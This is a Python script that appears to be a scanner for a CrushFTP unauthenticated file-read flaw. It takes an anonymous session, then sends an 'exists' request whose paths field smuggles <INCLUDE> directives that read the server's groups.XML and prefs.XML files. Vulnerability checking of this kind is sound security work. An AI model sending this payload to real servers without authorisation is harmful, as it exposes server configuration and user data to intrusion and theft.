#!/usr/bin/env python3 import requests import sys import argparse class CrushClient(object): def __init__(self, base_url=""): self.base = base_url self.token = "" @property def current_auth(self): if len(self.token) < 4: return "" return self.token[-4:] @property def headers(self): h = {} if self.token: h["Cookie"] = f"CrushAuth={self.token}; currentAuth={self.current_auth}" h["user_ip"] = "" return h def get(self, subdir): r = requests.get(self.base + subdir, headers=self.headers) return r def post(self, subdir, data): h = self.headers if self.current_auth: data["c2f"] = self.current_auth r = requests.post(self.base + subdir, headers=h, data=data) return r def cmd(self, command, params={}): d = {"command": command, "random": "0.34712915617878926"} d.update(params) r = self.post("/WebInterface/function/", d) return r def login(self, username, password): r = self.cmd("login", {"username": username, "password": password}) c = r.cookies.get_dict() if "CrushAuth" not in c: raise ValueError("CrushAuth cookie not found (invalid credentials?)") self.token = c["CrushAuth"] def login_anonymous(self): r = requests.get(self.base + "/WebInterface/") c = r.cookies.get_dict() if "CrushAuth" not in c: raise ValueError("CrushAuth cookie not found (no anonymous access?)") self.token = c["CrushAuth"] def main(): parser = argparse.ArgumentParser(description="Scan a target for CrushFTP File Read vulnerability") parser.add_argument("target", type=str, help="URL to target (example:") args = parser.parse_args() c = CrushClient(args.target) try: c.login_anonymous() except ValueError: print("Not vulnerable") return 0 r = c.cmd("exists", {"paths": "<INCLUDE>users/MainUsers/groups.XML</INCLUDE>"}) if "<groups" in r.text: print("Vulnerable") return 1 r = c.cmd("exists", {"paths": "<INCLUDE>prefs.XML</INCLUDE>"}) if "<server_prefs" in r.text: print("Vulnerable") return 1 print("Not vulnerable") return 0 if __name__ == "__main__": sys.exit(main() or 0)
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